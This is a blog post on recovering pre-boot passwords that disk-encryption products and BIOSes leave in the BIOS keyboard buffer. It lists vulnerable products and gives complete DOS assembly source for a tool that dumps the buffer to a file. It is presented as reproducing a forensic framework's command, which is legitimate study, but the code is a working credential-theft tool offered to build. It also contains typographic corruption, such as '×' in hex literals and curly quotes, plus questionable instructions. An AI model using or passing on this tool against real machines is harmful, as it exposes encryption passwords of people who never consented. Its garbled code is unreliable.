Duplicating Volatility Bioskbd Command Function on Live Windows Systems

I didn’t realize there was much demand for pulling passwords from BIOS keyboard buffers still until I saw that a “bioskbd” command had been added to the new 1.4 version of the Volatility Framework.

Examples of products that leak passwords in this manner:
Microsoft Bitlocker/Vista (SP0)
TrueCrypt 5.0 (possibly older versions also)
SafeBoot Device Encryption v4, Build 4750 and below
Secu Star’s DriveCrypt Plus Pack v3.9 (possibly other versions also)
DiskCryptor 0.2.6 for Windows (possibly other versions also)
Lenovo 7CETB5WW v2.05 (10/13/2006) BIOS (possibly others too)
Intel Corp PE94510M.86A.0050.2007.0710.1559 (07/10/2007) BIOS (possibly others too)
Hewlett-Packard 68DTT Ver. F.0D BIOS (possibly others too)

These passwords can be retrieved from a live system running one of the vulnerable products. Below is assembly language source code for building such a tool. NASM (free) can be used to build your copy of the tool from the source below.

org 100h

section .text

_start:
mov ah, 09h
mov dx, welcome
int 0×21 ; display some greeting msg

mov ax,0×40 ; 0×40:0x1e : keyboard buffer address
mov ds,ax

mov si, 0x1e
mov di, buffer
mov cx, 0×10

leakloop:
mov ax, [ds:si]

xor ah,ah

cmp al, 0×20
jae keepcopying
mov ax, 0×20

keepcopying:
cmp al, 0x7e
jb keepcopying2
mov ax, 0×20

keepcopying2:
mov [cs:di], ax
inc di
add si, byte +0×2

loop leakloop ; if CX not 0, then decrement CX and loop back up

push es
pop ds

mov ah, 0x3c ; MS DOS Create file Function
mov dx, fname
xor cx,cx
int 0×21

mov ax, 0x3d01 ; MS DOS Open file Function
int 0×21
mov bx, ax ; AX has the file handle if the open file call worked

mov ah, 0×40
mov cx,0×30
mov dx, Msg
int 0×21 ; Write buffer to file

mov ax,0x4c ; Quit
int 0×21

section .data

welcome db ”,10,13
db ‘Dumping password to file : PASSLEAK.TXT’,10,13
db ‘Look in PASSLEAK.TXT to see what was found in your BIOS keyboard buffer.’,10,13
db ‘This is a circular buffer, so your password might wrap around to the front.’,10,13
db ‘It should have the last 16 printable characters typed at the login screen.’,10,13
db ‘$’,10,13

handle: dw 0
fname db ‘Passleak.txt’,0
Msg: db ‘BIOS keyboard buffer contains: ‘,0
buffer: times 32 db ‘X’
;EOF

References:
http://www.ivizsecurity.com/security-advisory-iviz-sr-08010.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0807.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0806.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0805.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0804.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0804.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0803.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0802.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0801.html

email: david @ sharpesecurity.com
website: www.sharpesecurity.com
Twitter: twitter.com/sharpesecurity
Twitter: twitter.com/patchmanagement

Share

Leave a Reply